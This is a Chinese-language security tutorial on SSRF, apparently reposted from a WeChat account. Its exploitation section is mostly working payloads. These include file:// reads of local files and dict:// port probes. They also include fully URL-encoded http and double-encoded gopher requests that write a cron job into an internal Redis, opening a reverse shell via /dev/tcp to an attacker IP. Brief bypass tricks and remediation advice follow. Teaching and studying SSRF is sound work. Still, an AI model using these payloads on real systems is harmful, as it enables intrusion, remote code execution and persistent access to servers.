目录
简介
漏洞利用
1、读取服务器本地文件
利用file协议可以读取本地文件:
Windows:file://127.0.0.1/c:/ 访问本地C盘file://localhost/d:/ 访问本地D盘file:///e:/ 访问本地E盘Linux:file:///etc/hosts
现有 http://192.168.1.128/ssrf.php?url= 存在SSRF漏洞,可利用file协议读取本地文件:
?url=file:///c:/windows/win.ini?url=file://127.0.0.1/c:/windows/win.ini?url=file://localhost/c:/windows/win.ini
2、收集内网信息
方法一:直接将参数值设置为内网地址,附带端口号,判断内网主机端口开放情况,这里探测到服务器开放3306端口
?url=127.0.0.1:3306
方法二:利用dict协议探测端口,dict协议格式如下:
dict://ip:port/命令:参数其中命令和参数不是必须的。
使用dict协议探测到服务器开放3306端口:
?url=dict://127.0.0.1:3306/
3、攻击内网redis
方法一:利用http协议
1)redis是通过换行符区分每条命令的,可以使用%0d%0a代表换行符,达到一次传入多条命令的目的,利用redis写计划任务反弹shell:
set 1 "nnnn0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.11.132/4444 0>&1'nnnn"config set dir /etc/config set dbfilename crontabsave
2)特殊字符进行url编码,换行符使用%0d%0a:
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave3)拼接前还需要在前后加上一些字符表示开始和结束:
开头:start%0d%0a%0d%0a结尾:%0d%0a%0d%0aend其中start和end可以是任何字符串,没有要求
4)得到最终payload
start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend5)发送攻击请求包,成功反弹shell
?url=http://172.19.0.2:6379/start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend
方法二:利用gopher协议攻击内网redis,gopher协议可以构造任意的tcp/ip数据包,格式如下:
gopher://ip:port/_数据1)可用如下工具生成反弹shell的payload:
https://github.com/tarunkant/Gopherus
其中127.0.0.1:6379要换成实际的存在redis服务的地址。
2)由于服务端接受数据后会自动进行一次url解码,为了保持结构完整,需要对gopher协议的数据再进行一次url编码
gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A3)最后作为参数发送请求包
?url=gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A绕过技巧
1、本地回环地址
2、双重URL编码混淆
3、"@"符号绕过
修复建议
1、限制请求的端口只能为web端口,例如80、8080
2、只允许发起http和https的请求
3、采用白名单的方式限制访问的目标地址,禁止访问内网ip
4、屏蔽返回的详细信息
END
查看更多精彩内容,关注simple学安全
原文始发于微信公众号(simple学安全):一文读懂SSRF漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论